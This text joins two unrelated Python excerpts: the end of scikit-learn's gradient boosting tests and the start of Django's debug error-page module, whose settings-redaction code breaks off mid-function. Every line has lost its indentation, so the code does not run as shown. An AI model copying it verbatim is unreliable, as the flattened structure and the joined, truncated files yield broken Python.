assert_raises(ValueError, clf.predict, x)
x = np.array([])
assert_raises(ValueError, clf.predict, x)
x = np.array([1.0, 2.0, 3.0])[:, np.newaxis]
assert_raises(ValueError, clf.predict, x)
def test_check_max_features():
# test if max_features is valid.
clf = GradientBoostingRegressor(n_estimators=100, random_state=1,
max_features=0)
assert_raises(ValueError, clf.fit, X, y)
clf = GradientBoostingRegressor(n_estimators=100, random_state=1,
max_features=(len(X[0]) + 1))
assert_raises(ValueError, clf.fit, X, y)
clf = GradientBoostingRegressor(n_estimators=100, random_state=1,
max_features=-0.1)
assert_raises(ValueError, clf.fit, X, y)
def test_max_feature_regression():
# Test to make sure random state is set properly.
X, y = datasets.make_hastie_10_2(n_samples=12000, random_state=1)
X_train, X_test = X[:2000], X[2000:]
y_train, y_test = y[:2000], y[2000:]
gbrt = GradientBoostingClassifier(n_estimators=100, min_samples_split=5,
max_depth=2, learning_rate=.1,
max_features=2, random_state=1)
gbrt.fit(X_train, y_train)
deviance = gbrt.loss_(y_test, gbrt.decision_function(X_test))
assert_true(deviance < 0.5, "GB failed with deviance %.4f" % deviance)
def test_max_feature_auto():
# Test if max features is set properly for floats and str.
X, y = datasets.make_hastie_10_2(n_samples=12000, random_state=1)
_, n_features = X.shape
X_train = X[:2000]
y_train = y[:2000]
gbrt = GradientBoostingClassifier(n_estimators=1, max_features='auto')
gbrt.fit(X_train, y_train)
assert_equal(gbrt.max_features_, int(np.sqrt(n_features)))
gbrt = GradientBoostingRegressor(n_estimators=1, max_features='auto')
gbrt.fit(X_train, y_train)
assert_equal(gbrt.max_features_, n_features)
gbrt = GradientBoostingRegressor(n_estimators=1, max_features=0.3)
gbrt.fit(X_train, y_train)
assert_equal(gbrt.max_features_, int(n_features * 0.3))
gbrt = GradientBoostingRegressor(n_estimators=1, max_features='sqrt')
gbrt.fit(X_train, y_train)
assert_equal(gbrt.max_features_, int(np.sqrt(n_features)))
gbrt = GradientBoostingRegressor(n_estimators=1, max_features='log2')
gbrt.fit(X_train, y_train)
assert_equal(gbrt.max_features_, int(np.log2(n_features)))
gbrt = GradientBoostingRegressor(n_estimators=1,
max_features=0.01 / X.shape[1])
gbrt.fit(X_train, y_train)
assert_equal(gbrt.max_features_, 1)
def test_staged_predict():
# Test whether staged decision function eventually gives
# the same prediction.
X, y = datasets.make_friedman1(n_samples=1200,
random_state=1, noise=1.0)
X_train, y_train = X[:200], y[:200]
X_test = X[200:]
clf = GradientBoostingRegressor()
# test raise ValueError if not fitted
assert_raises(ValueError, lambda X: np.fromiter(
clf.staged_predict(X), dtype=np.float64), X_test)
clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
# test if prediction for last stage equals ``predict``
for y in clf.staged_predict(X_test):
assert_equal(y.shape, y_pred.shape)
assert_array_equal(y_pred, y)
def test_staged_predict_proba():
# Test whether staged predict proba eventually gives
# the same prediction.
X, y = datasets.make_hastie_10_2(n_samples=1200,
random_state=1)
X_train, y_train = X[:200], y[:200]
X_test, y_test = X[200:], y[200:]
clf = GradientBoostingClassifier(n_estimators=20)
# test raise NotFittedError if not fitted
assert_raises(NotFittedError, lambda X: np.fromiter(
clf.staged_predict_proba(X), dtype=np.float64), X_test)
clf.fit(X_train, y_train)
# test if prediction for last stage equals ``predict``
for y_pred in clf.staged_predict(X_test):
assert_equal(y_test.shape, y_pred.shape)
assert_array_equal(clf.predict(X_test), y_pred)
# test if prediction for last stage equals ``predict_proba``
for staged_proba in clf.staged_predict_proba(X_test):
assert_equal(y_test.shape[0], staged_proba.shape[0])
assert_equal(2, staged_proba.shape[1])
assert_array_equal(clf.predict_proba(X_test), staged_proba)
def test_staged_functions_defensive():
# test that staged_functions make defensive copies
rng = np.random.RandomState(0)
X = rng.uniform(size=(10, 3))
y = (4 * X[:, 0]).astype(np.int) + 1 # don't predict zeros
for estimator in [GradientBoostingRegressor(),
GradientBoostingClassifier()]:
estimator.fit(X, y)
for func in ['predict', 'decision_function', 'predict_proba']:
staged_func = getattr(estimator, "staged_" + func, None)
if staged_func is None:
# regressor has no staged_predict_proba
continue
with warnings.catch_warnings(record=True):
staged_result = list(staged_func(X))
staged_result[1][:] = 0
assert_true(np.all(staged_result[0] != 0))
def test_serialization():
# Check model serialization.
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
clf.fit(X, y)
assert_array_equal(clf.predict(T), true_result)
assert_equal(100, len(clf.estimators_))
try:
import cPickle as pickle
except ImportError:
import pickle
serialized_clf = pickle.dumps(clf, protocol=pickle.HIGHEST_PROTOCOL)
clf = None
clf = pickle.loads(serialized_clf)
assert_array_equal(clf.predict(T), true_result)
assert_equal(100, len(clf.estimators_))
def test_degenerate_targets():
# Check if we can fit even though all targets are equal.
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
# classifier should raise exception
assert_raises(ValueError, clf.fit, X, np.ones(len(X)))
clf = GradientBoostingRegressor(n_estimators=100, random_state=1)
clf.fit(X, np.ones(len(X)))
clf.predict(rng.rand(2))
assert_array_equal(np.ones((1,), dtype=np.float64),
clf.predict(rng.rand(2)))
def test_quantile_loss():
# Check if quantile loss with alpha=0.5 equals lad.
clf_quantile = GradientBoostingRegressor(n_estimators=100, loss='quantile',
max_depth=4, alpha=0.5,
random_state=7)
clf_quantile.fit(boston.data, boston.target)
y_quantile = clf_quantile.predict(boston.data)
clf_lad = GradientBoostingRegressor(n_estimators=100, loss='lad',
max_depth=4, random_state=7)
clf_lad.fit(boston.data, boston.target)
y_lad = clf_lad.predict(boston.data)
assert_array_almost_equal(y_quantile, y_lad, decimal=4)
def test_symbol_labels():
# Test with non-integer class labels.
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
symbol_y = tosequence(map(str, y))
clf.fit(X, symbol_y)
assert_array_equal(clf.predict(T), tosequence(map(str, true_result)))
assert_equal(100, len(clf.estimators_))
def test_float_class_labels():
# Test with float class labels.
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
float_y = np.asarray(y, dtype=np.float32)
clf.fit(X, float_y)
assert_array_equal(clf.predict(T),
np.asarray(true_result, dtype=np.float32))
assert_equal(100, len(clf.estimators_))
def test_shape_y():
# Test with float class labels.
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
y_ = np.asarray(y, dtype=np.int32)
y_ = y_[:, np.newaxis]
# This will raise a DataConversionWarning that we want to
# "always" raise, elsewhere the warnings gets ignored in the
# later tests, and the tests that check for this warning fail
assert_warns(DataConversionWarning, clf.fit, X, y_)
assert_array_equal(clf.predict(T), true_result)
assert_equal(100, len(clf.estimators_))
def test_mem_layout():
# Test with different memory layouts of X and y
X_ = np.asfortranarray(X)
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
clf.fit(X_, y)
assert_array_equal(clf.predict(T), true_result)
assert_equal(100, len(clf.estimators_))
X_ = np.ascontiguousarray(X)
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
clf.fit(X_, y)
assert_array_equal(clf.predict(T), true_result)
assert_equal(100, len(clf.estimators_))
y_ = np.asarray(y, dtype=np.int32)
y_ = np.ascontiguousarray(y_)
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
clf.fit(X, y_)
assert_array_equal(clf.predict(T), true_result)
assert_equal(100, len(clf.estimators_))
y_ = np.asarray(y, dtype=np.int32)
y_ = np.asfortranarray(y_)
clf = GradientBoostingClassifier(n_estimators=100, random_state=1)
clf.fit(X, y_)
assert_array_equal(clf.predict(T), true_result)
assert_equal(100, len(clf.estimators_))
def test_oob_improvement():
# Test if oob improvement has correct shape and regression test.
clf = GradientBoostingClassifier(n_estimators=100, random_state=1,
subsample=0.5)
clf.fit(X, y)
assert clf.oob_improvement_.shape[0] == 100
# hard-coded regression test - change if modification in OOB computation
assert_array_almost_equal(clf.oob_improvement_[:5],
np.array([0.19, 0.15, 0.12, -0.12, -0.11]),
decimal=2)
def test_oob_improvement_raise():
# Test if oob improvement has correct shape.
clf = GradientBoostingClassifier(n_estimators=100, random_state=1,
subsample=1.0)
clf.fit(X, y)
assert_raises(AttributeError, lambda: clf.oob_improvement_)
def test_oob_multilcass_iris():
# Check OOB improvement on multi-class dataset.
clf = GradientBoostingClassifier(n_estimators=100, loss='deviance',
random_state=1, subsample=0.5)
clf.fit(iris.data, iris.target)
score = clf.score(iris.data, iris.target)
assert score > 0.9, "Failed with subsample %.1f " \
"and score = %f" % (0.5, score)
assert clf.oob_improvement_.shape[0] == clf.n_estimators
# hard-coded regression test - change if modification in OOB computation
# FIXME: the following snippet does not yield the same results on 32 bits
# assert_array_almost_equal(clf.oob_improvement_[:5],
# np.array([12.68, 10.45, 8.18, 6.43, 5.13]),
# decimal=2)
def test_verbose_output():
# Check verbose=1 does not cause error.
from sklearn.externals.six.moves import cStringIO as StringIO
import sys
old_stdout = sys.stdout
sys.stdout = StringIO()
clf = GradientBoostingClassifier(n_estimators=100, random_state=1,
verbose=1, subsample=0.8)
clf.fit(X, y)
verbose_output = sys.stdout
sys.stdout = old_stdout
# check output
verbose_output.seek(0)
header = verbose_output.readline().rstrip()
# with OOB
true_header = ' '.join(['%10s'] + ['%16s'] * 3) % (
'Iter', 'Train Loss', 'OOB Improve', 'Remaining Time')
assert_equal(true_header, header)
n_lines = sum(1 for l in verbose_output.readlines())
# one for 1-10 and then 9 for 20-100
assert_equal(10 + 9, n_lines)
def test_more_verbose_output():
# Check verbose=2 does not cause error.
from sklearn.externals.six.moves import cStringIO as StringIO
import sys
old_stdout = sys.stdout
sys.stdout = StringIO()
clf = GradientBoostingClassifier(n_estimators=100, random_state=1,
verbose=2)
clf.fit(X, y)
verbose_output = sys.stdout
sys.stdout = old_stdout
# check output
verbose_output.seek(0)
header = verbose_output.readline().rstrip()
# no OOB
true_header = ' '.join(['%10s'] + ['%16s'] * 2) % (
'Iter', 'Train Loss', 'Remaining Time')
assert_equal(true_header, header)
n_lines = sum(1 for l in verbose_output.readlines())
# 100 lines for n_estimators==100
assert_equal(100, n_lines)
def test_warm_start():
# Test if warm start equals fit.
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
for Cls in [GradientBoostingRegressor, GradientBoostingClassifier]:
est = Cls(n_estimators=200, max_depth=1)
est.fit(X, y)
est_ws = Cls(n_estimators=100, max_depth=1, warm_start=True)
est_ws.fit(X, y)
est_ws.set_params(n_estimators=200)
est_ws.fit(X, y)
assert_array_almost_equal(est_ws.predict(X), est.predict(X))
def test_warm_start_n_estimators():
# Test if warm start equals fit - set n_estimators.
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
for Cls in [GradientBoostingRegressor, GradientBoostingClassifier]:
est = Cls(n_estimators=300, max_depth=1)
est.fit(X, y)
est_ws = Cls(n_estimators=100, max_depth=1, warm_start=True)
est_ws.fit(X, y)
est_ws.set_params(n_estimators=300)
est_ws.fit(X, y)
assert_array_almost_equal(est_ws.predict(X), est.predict(X))
def test_warm_start_max_depth():
# Test if possible to fit trees of different depth in ensemble.
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
for Cls in [GradientBoostingRegressor, GradientBoostingClassifier]:
est = Cls(n_estimators=100, max_depth=1, warm_start=True)
est.fit(X, y)
est.set_params(n_estimators=110, max_depth=2)
est.fit(X, y)
# last 10 trees have different depth
assert est.estimators_[0, 0].max_depth == 1
for i in range(1, 11):
assert est.estimators_[-i, 0].max_depth == 2
def test_warm_start_clear():
# Test if fit clears state.
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
for Cls in [GradientBoostingRegressor, GradientBoostingClassifier]:
est = Cls(n_estimators=100, max_depth=1)
est.fit(X, y)
est_2 = Cls(n_estimators=100, max_depth=1, warm_start=True)
est_2.fit(X, y) # inits state
est_2.set_params(warm_start=False)
est_2.fit(X, y) # clears old state and equals est
assert_array_almost_equal(est_2.predict(X), est.predict(X))
def test_warm_start_zero_n_estimators():
# Test if warm start with zero n_estimators raises error
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
for Cls in [GradientBoostingRegressor, GradientBoostingClassifier]:
est = Cls(n_estimators=100, max_depth=1, warm_start=True)
est.fit(X, y)
est.set_params(n_estimators=0)
assert_raises(ValueError, est.fit, X, y)
def test_warm_start_smaller_n_estimators():
# Test if warm start with smaller n_estimators raises error
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
for Cls in [GradientBoostingRegressor, GradientBoostingClassifier]:
est = Cls(n_estimators=100, max_depth=1, warm_start=True)
est.fit(X, y)
est.set_params(n_estimators=99)
assert_raises(ValueError, est.fit, X, y)
def test_warm_start_equal_n_estimators():
# Test if warm start with equal n_estimators does nothing
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
for Cls in [GradientBoostingRegressor, GradientBoostingClassifier]:
est = Cls(n_estimators=100, max_depth=1)
est.fit(X, y)
est2 = clone(est)
est2.set_params(n_estimators=est.n_estimators, warm_start=True)
est2.fit(X, y)
assert_array_almost_equal(est2.predict(X), est.predict(X))
def test_warm_start_oob_switch():
# Test if oob can be turned on during warm start.
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
for Cls in [GradientBoostingRegressor, GradientBoostingClassifier]:
est = Cls(n_estimators=100, max_depth=1, warm_start=True)
est.fit(X, y)
est.set_params(n_estimators=110, subsample=0.5)
est.fit(X, y)
assert_array_equal(est.oob_improvement_[:100], np.zeros(100))
# the last 10 are not zeros
assert_array_equal(est.oob_improvement_[-10:] == 0.0,
np.zeros(10, dtype=np.bool))
def test_warm_start_oob():
# Test if warm start OOB equals fit.
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
for Cls in [GradientBoostingRegressor, GradientBoostingClassifier]:
est = Cls(n_estimators=200, max_depth=1, subsample=0.5,
random_state=1)
est.fit(X, y)
est_ws = Cls(n_estimators=100, max_depth=1, subsample=0.5,
random_state=1, warm_start=True)
est_ws.fit(X, y)
est_ws.set_params(n_estimators=200)
est_ws.fit(X, y)
assert_array_almost_equal(est_ws.oob_improvement_[:100],
est.oob_improvement_[:100])
def early_stopping_monitor(i, est, locals):
"""Returns True on the 10th iteration. """
if i == 9:
return True
else:
return False
def test_monitor_early_stopping():
# Test if monitor return value works.
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
for Cls in [GradientBoostingRegressor, GradientBoostingClassifier]:
est = Cls(n_estimators=20, max_depth=1, random_state=1, subsample=0.5)
est.fit(X, y, monitor=early_stopping_monitor)
assert_equal(est.n_estimators, 20) # this is not altered
assert_equal(est.estimators_.shape[0], 10)
assert_equal(est.train_score_.shape[0], 10)
assert_equal(est.oob_improvement_.shape[0], 10)
# try refit
est.set_params(n_estimators=30)
est.fit(X, y)
assert_equal(est.n_estimators, 30)
assert_equal(est.estimators_.shape[0], 30)
assert_equal(est.train_score_.shape[0], 30)
est = Cls(n_estimators=20, max_depth=1, random_state=1, subsample=0.5,
warm_start=True)
est.fit(X, y, monitor=early_stopping_monitor)
assert_equal(est.n_estimators, 20)
assert_equal(est.estimators_.shape[0], 10)
assert_equal(est.train_score_.shape[0], 10)
assert_equal(est.oob_improvement_.shape[0], 10)
# try refit
est.set_params(n_estimators=30, warm_start=False)
est.fit(X, y)
assert_equal(est.n_estimators, 30)
assert_equal(est.train_score_.shape[0], 30)
assert_equal(est.estimators_.shape[0], 30)
assert_equal(est.oob_improvement_.shape[0], 30)
def test_complete_classification():
# Test greedy trees with max_depth + 1 leafs.
from sklearn.tree._tree import TREE_LEAF
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
k = 4
est = GradientBoostingClassifier(n_estimators=20, max_depth=None,
random_state=1, max_leaf_nodes=k + 1)
est.fit(X, y)
tree = est.estimators_[0, 0].tree_
assert_equal(tree.max_depth, k)
assert_equal(tree.children_left[tree.children_left == TREE_LEAF].shape[0],
k + 1)
def test_complete_regression():
# Test greedy trees with max_depth + 1 leafs.
from sklearn.tree._tree import TREE_LEAF
k = 4
est = GradientBoostingRegressor(n_estimators=20, max_depth=None,
random_state=1, max_leaf_nodes=k + 1)
est.fit(boston.data, boston.target)
tree = est.estimators_[-1, 0].tree_
assert_equal(tree.children_left[tree.children_left == TREE_LEAF].shape[0],
k + 1)
def test_zero_estimator_reg():
# Test if ZeroEstimator works for regression.
est = GradientBoostingRegressor(n_estimators=20, max_depth=1,
random_state=1, init=ZeroEstimator())
est.fit(boston.data, boston.target)
y_pred = est.predict(boston.data)
mse = mean_squared_error(boston.target, y_pred)
assert_almost_equal(mse, 33.0, decimal=0)
est = GradientBoostingRegressor(n_estimators=20, max_depth=1,
random_state=1, init='zero')
est.fit(boston.data, boston.target)
y_pred = est.predict(boston.data)
mse = mean_squared_error(boston.target, y_pred)
assert_almost_equal(mse, 33.0, decimal=0)
est = GradientBoostingRegressor(n_estimators=20, max_depth=1,
random_state=1, init='foobar')
assert_raises(ValueError, est.fit, boston.data, boston.target)
def test_zero_estimator_clf():
# Test if ZeroEstimator works for classification.
X = iris.data
y = np.array(iris.target)
est = GradientBoostingClassifier(n_estimators=20, max_depth=1,
random_state=1, init=ZeroEstimator())
est.fit(X, y)
assert est.score(X, y) > 0.96
est = GradientBoostingClassifier(n_estimators=20, max_depth=1,
random_state=1, init='zero')
est.fit(X, y)
assert est.score(X, y) > 0.96
# binary clf
mask = y != 0
y[mask] = 1
y[~mask] = 0
est = GradientBoostingClassifier(n_estimators=20, max_depth=1,
random_state=1, init='zero')
est.fit(X, y)
assert est.score(X, y) > 0.96
est = GradientBoostingClassifier(n_estimators=20, max_depth=1,
random_state=1, init='foobar')
assert_raises(ValueError, est.fit, X, y)
def test_max_leaf_nodes_max_depth():
# Test preceedence of max_leaf_nodes over max_depth.
X, y = datasets.make_hastie_10_2(n_samples=100, random_state=1)
all_estimators = [GradientBoostingRegressor,
GradientBoostingClassifier]
k = 4
for GBEstimator in all_estimators:
est = GBEstimator(max_depth=1, max_leaf_nodes=k).fit(X, y)
tree = est.estimators_[0, 0].tree_
assert_greater(tree.max_depth, 1)
est = GBEstimator(max_depth=1).fit(X, y)
tree = est.estimators_[0, 0].tree_
assert_equal(tree.max_depth, 1)
def test_warm_start_wo_nestimators_change():
# Test if warm_start does nothing if n_estimators is not changed.
# Regression test for #3513.
clf = GradientBoostingClassifier(n_estimators=10, warm_start=True)
clf.fit([[0, 1], [2, 3]], [0, 1])
assert clf.estimators_.shape[0] == 10
clf.fit([[0, 1], [2, 3]], [0, 1])
assert clf.estimators_.shape[0] == 10
def test_probability_exponential():
# Predict probabilities.
clf = GradientBoostingClassifier(loss='exponential',
n_estimators=100, random_state=1)
assert_raises(ValueError, clf.predict_proba, T)
clf.fit(X, y)
assert_array_equal(clf.predict(T), true_result)
# check if probabilities are in [0, 1].
y_proba = clf.predict_proba(T)
assert np.all(y_proba >= 0.0)
assert np.all(y_proba <= 1.0)
score = clf.decision_function(T).ravel()
assert_array_almost_equal(y_proba[:, 1],
1.0 / (1.0 + np.exp(-2 * score)))
# derive predictions from probabilities
y_pred = clf.classes_.take(y_proba.argmax(axis=1), axis=0)
assert_array_equal(y_pred, true_result)
def test_non_uniform_weights_toy_edge_case_reg():
X = [[1, 0],
[1, 0],
[1, 0],
[0, 1]]
y = [0, 0, 1, 0]
# ignore the first 2 training samples by setting their weight to 0
sample_weight = [0, 0, 1, 1]
for loss in ('huber', 'ls', 'lad', 'quantile'):
gb = GradientBoostingRegressor(learning_rate=1.0, n_estimators=2, loss=loss)
gb.fit(X, y, sample_weight=sample_weight)
assert_greater(gb.predict([[1, 0]])[0], 0.5)
def test_non_uniform_weights_toy_min_weight_leaf():
# Regression test for issue #4447
X = [[1, 0],
[1, 0],
[1, 0],
[0, 1],
]
y = [0, 0, 1, 0]
# ignore the first 2 training samples by setting their weight to 0
sample_weight = [0, 0, 1, 1]
gb = GradientBoostingRegressor(n_estimators=5, min_weight_fraction_leaf=0.1)
gb.fit(X, y, sample_weight=sample_weight)
assert_true(gb.predict([[1, 0]])[0] > 0.5)
assert_almost_equal(gb.estimators_[0, 0].splitter.min_weight_leaf, 0.2)
def test_non_uniform_weights_toy_edge_case_clf():
X = [[1, 0],
[1, 0],
[1, 0],
[0, 1]]
y = [0, 0, 1, 0]
# ignore the first 2 training samples by setting their weight to 0
sample_weight = [0, 0, 1, 1]
for loss in ('deviance', 'exponential'):
gb = GradientBoostingClassifier(n_estimators=5)
gb.fit(X, y, sample_weight=sample_weight)
assert_array_equal(gb.predict([[1, 0]]), [1])
|
|
from __future__ import unicode_literals
import re
import sys
import types
from django.conf import settings
from django.core.urlresolvers import Resolver404, resolve
from django.http import (
HttpRequest, HttpResponse, HttpResponseNotFound, build_request_repr,
)
from django.template import Context, Engine, TemplateDoesNotExist
from django.template.defaultfilters import force_escape, pprint
from django.utils import lru_cache, six, timezone
from django.utils.datastructures import MultiValueDict
from django.utils.encoding import force_bytes, smart_text
from django.utils.module_loading import import_string
from django.utils.translation import ugettext as _
# Minimal Django templates engine to render the error templates
# regardless of the project's TEMPLATES setting.
DEBUG_ENGINE = Engine(debug=True)
HIDDEN_SETTINGS = re.compile('API|TOKEN|KEY|SECRET|PASS|SIGNATURE')
CLEANSED_SUBSTITUTE = '********************'
def linebreak_iter(template_source):
yield 0
p = template_source.find('\n')
while p >= 0:
yield p + 1
p = template_source.find('\n', p + 1)
yield len(template_source) + 1
class CallableSettingWrapper(object):
""" Object to wrap callable appearing in settings
* Not to call in the debug page (#21345).
* Not to break the debug page if the callable forbidding to set attributes (#23070).
"""
def __init__(self, callable_setting):
self._wrapped = callable_setting
def __repr__(self):
return repr(self._wrapped)
def cleanse_setting(key, value):
"""Cleanse an individual setting key/value of sensitive content.
If the value is a dictionary, recursively cleanse the keys in
that dictionary.
"""
try:
if HIDDEN_SETTINGS.search(key):
cleansed = CLEANSED_SUBSTITUTE
else:
if isinstance(value, dict):
cleansed = {k: cleanse_setting(k, v) for k, v in value.items()}
else:
cleansed = value
except TypeError:
# If the key isn't regex-able, just return as-is.
cleansed = value
if callable(cleansed):
# For fixing #21345 and #23070
cleansed = CallableSettingWrapper(cleansed)
return cleansed
def get_safe_settings():
"Returns a dictionary of the settings module, with sensitive settings blurred out."
settings_dict = {}
for k in dir(settings):
if k.isupper():
settings_dict[k] = cleanse_setting(k, getattr(settings, k))
return settings_dict
def technical_500_response(request, exc_type, exc_value, tb, status_code=500):
"""
Create a technical server error response. The last three arguments are
the values returned from sys.exc_info() and friends.
"""
reporter = ExceptionReporter(request, exc_type, exc_value, tb)
if request.is_ajax():
text = reporter.get_traceback_text()
return HttpResponse(text, status=status_code, content_type='text/plain')
else:
html = reporter.get_traceback_html()
return HttpResponse(html, status=status_code, content_type='text/html')
@lru_cache.lru_cache()
def get_default_exception_reporter_filter():
# Instantiate the default filter for the first time and cache it.
return import_string(settings.DEFAULT_EXCEPTION_REPORTER_FILTER)()
def get_exception_reporter_filter(request):
default_filter = get_default_exception_reporter_filter()
return getattr(request, 'exception_reporter_filter', default_filter)
class ExceptionReporterFilter(object):
"""
Base for all exception reporter filter classes. All overridable hooks
contain lenient default behaviors.
"""
def get_request_repr(self, request):
if request is None:
return repr(None)
else:
return build_request_repr(request, POST_override=self.get_post_parameters(request))
def get_post_parameters(self, request):
if request is None:
return {}
else:
return request.POST
def get_traceback_frame_variables(self, request, tb_frame):
return list(tb_frame.f_locals.items())
class SafeExceptionReporterFilter(ExceptionReporterFilter):
"""
Use annotations made by the sensitive_post_parameters and
sensitive_variables decorators to filter out sensitive information.
"""
def is_active(self, request):
"""
This filter is to add safety in production environments (i.e. DEBUG
is False). If DEBUG is True then your site is not safe anyway.
This hook is provided as a convenience to easily activate or
deactivate the filter on a per request basis.
"""
return settings.DEBUG is False
def get_cleansed_multivaluedict(self, request, multivaluedict):
"""
Replaces the keys in a MultiValueDict marked as sensitive with stars.
This mitigates leaking sensitive POST parameters if something like
request.POST['nonexistent_key'] throws an exception (#21098).
"""
sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', [])
if self.is_active(request) and sensitive_post_parameters:
multivaluedict = multivaluedict.copy()
for param in sensitive_post_parameters:
if param in multivaluedict:
multivaluedict[param] = CLEANSED_SUBSTITUTE
return multivaluedict
def get_post_parameters(self, request):
"""
Replaces the values of POST parameters marked as sensitive with
stars (*********).
"""
if request is None:
return {}
else:
sensitive_post_parameters = getattr(request, 'sensitive_post_parameters', [])
if self.is_active(request) and sensitive_post_parameters:
cleansed = request.POST.copy()
if sensitive_post_parameters == '__ALL__':
# Cleanse all parameters.
for k, v in cleansed.items():
cleansed[k] = CLEANSED_SUBSTITUTE
return cleansed
else:
# Cleanse only the specified parameters.
for param in sensitive_post_parameters:
if param in cleansed:
cleansed[param] = CLEANSED_SUBSTITUTE
return cleansed
else:
return request.POST
def cleanse_special_types(self, request, value):
try:
# If value is lazy or a complex object of another kind, this check
# might raise an exception. isinstance checks that lazy HttpRequests
# or MultiValueDicts will have a return value.
is_request = isinstance(value, HttpRequest)
except Exception as e:
return '{!r} while evaluating {!r}'.format(e, value)
if is_request:
# Cleanse the request's POST parameters.
value = self.get_request_repr(value)
elif isinstance(value, MultiValueDict):
# Cleanse MultiValueDicts (request.POST is the one we usually care about)
value = self.get_cleansed_multivaluedict(request, value)
return value
def get_traceback_frame_variables(self, request, tb_frame):
"""
Replaces the values of variables marked as sensitive with
stars (*********).
"""
# Loop through the frame's callers to see if the sensitive_variables
# decorator was used.
current_frame = tb_frame.f_back
sensitive_variables = None
while current_frame is not None:
if (current_frame.f_code.co_name == 'sensitive_variables_wrapper'
and 'sensitive_variables_wrapper' in current_frame.f_locals):
# The sensitive_variables decorator was used, so we take note
# of the sensitive variables' names.
wrapper = current_frame.f_locals['sensitive_variables_wrapper']
sensitive_variables = getattr(wrapper, 'sensitive_variables', None)
break
current_frame = current_frame.f_back
cleansed = {}
if self.is_active(request) and sensitive_variables:
if sensitive_variables == '__ALL__':
# Cleanse all variables
for name, value in tb_frame.f_locals.items():
cleansed[name] = CLEANSED_SUBSTITUTE
else:
# Cleanse specified variables
for name, value in tb_frame.f_locals.items():
if name in sensitive_variables:
value = CLEANSED_SUBSTITUTE
else:
value = self.cleanse_special_types(request, value)
cleansed[name] = value
else:
# Potentially cleanse the request and any MultiValueDicts if they
# are one of the frame variables.
for name, value in tb_frame.f_locals.items():
cleansed[name] = self.cleanse_special_types(request, value)
if (tb_frame.f_code.co_name == 'sensitive_variables_wrapper'
and 'sensitive_variables_wrapper' in tb_frame.f_locals):
# For good measure, obfuscate the decorated function's arguments in
# the sensitive_variables decorator's frame, in case the variables
# associated with those arguments were meant to be obfuscated from
# the decorated function's frame.
cleansed['func_args'] = CLEANSED_SUBSTITUTE
cleansed['func_kwargs'] = CLEANSED_SUBSTITUTE
return cleansed.items()
class ExceptionReporter(object):
"""
A class to organize and coordinate reporting on exceptions.
"""
def __init__(self, request, exc_type, exc_value, tb, is_email=False):
self.request = request
self.filter = get_exception_reporter_filter(self.request)
self.exc_type = exc_type
self.exc_value = exc_value
self.tb = tb
self.is_email = is_email
self.template_info = getattr(self.exc_value, 'template_debug', None)
self.template_does_not_exist = False
self.postmortem = None
# Handle deprecated string exceptions
if isinstance(self.exc_type, six.string_types):
self.exc_value = Exception('Deprecated String Exception: %r' % self.exc_type)
self.exc_type = type(self.exc_value)
def get_traceback_data(self):
"""Return a dictionary containing traceback information."""
if self.exc_type and issubclass(self.exc_type, TemplateDoesNotExist):
self.template_does_not_exist = True
self.postmortem = self.exc_value.chain or [self.exc_value]
frames = self.get_traceback_frames()
for i, frame in enumerate(frames):
if 'vars' in frame:
frame_vars = []
for k, v in frame['vars']:
v = pprint(v)
# The force_escape filter assume unicode, make sure that works
if isinstance(v, six.binary_type):
v = v.decode('utf-8', 'replace') # don't choke on non-utf-8 input
# Trim large blobs of data
if len(v) > 4096:
v = '%s... <trimmed %d bytes string>' % (v[0:4096], len(v))
frame_vars.append((k, force_escape(v)))
frame['vars'] = frame_vars
frames[i] = frame
unicode_hint = ''
if self.exc_type and issubclass(self.exc_type, UnicodeError):
start = getattr(self.exc_value, 'start', None)
end = getattr(self.exc_value, 'end', None)
if start is not None and end is not None:
unicode_str = self.exc_value.args[1]
unicode_hint = smart_text(
unicode_str[max(start - 5, 0):min(end + 5, len(unicode_str))],
'ascii', errors='replace'
)
from django import get_version
c = {
'is_email': self.is_email,
'unicode_hint': unicode_hint,
'frames': frames,
'request': self.request,
'filtered_POST': self.filter.get_post_parameters(self.request),
'settings': get_safe_settings(),
'sys_executable': sys.executable,
'sys_version_info': '%d.%d.%d' % sys.version_info[0:3],
'server_time': timezone.now(),
'django_version_info': get_version(),
'sys_path': sys.path,
'template_info': self.template_info,
'template_does_not_exist': self.template_does_not_exist,
'postmortem': self.postmortem,
}
# Check whether exception info is available
if self.exc_type:
c['exception_type'] = self.exc_type.__name__
if self.exc_value:
c['exception_value'] = smart_text(self.exc_value, errors='replace')
if frames:
c['lastframe'] = frames[-1]
return c
def get_traceback_html(self):
"Return HTML version of debug 500 HTTP error page."
t = DEBUG_ENGINE.from_string(TECHNICAL_500_TEMPLATE)
c = Context(self.get_traceback_data(), use_l10n=False)
return t.render(c)
def get_traceback_text(self):
"Return plain text version of debug 500 HTTP error page."
t = DEBUG_ENGINE.from_string(TECHNICAL_500_TEXT_TEMPLATE)
c = Context(self.get_traceback_data(), autoescape=False, use_l10n=False)
return t.render(c)
def _get_lines_from_file(self, filename, lineno, context_lines, loader=None, module_name=None):
"""
Returns context_lines before and after lineno from file.
Returns (pre_context_lineno, pre_context, context_line, post_context).
"""
source = None
if loader is not None and hasattr(loader, "get_source"):
try:
source = loader.get_source(module_name)
except ImportError:
pass
if source is not None:
source = source.splitlines()
if source is None:
try:
with open(filename, 'rb') as fp:
source = fp.read().splitlines()
except (OSError, IOError):
pass
if source is None:
return None, [], None, []
# If we just read the source from a file, or if the loader did not
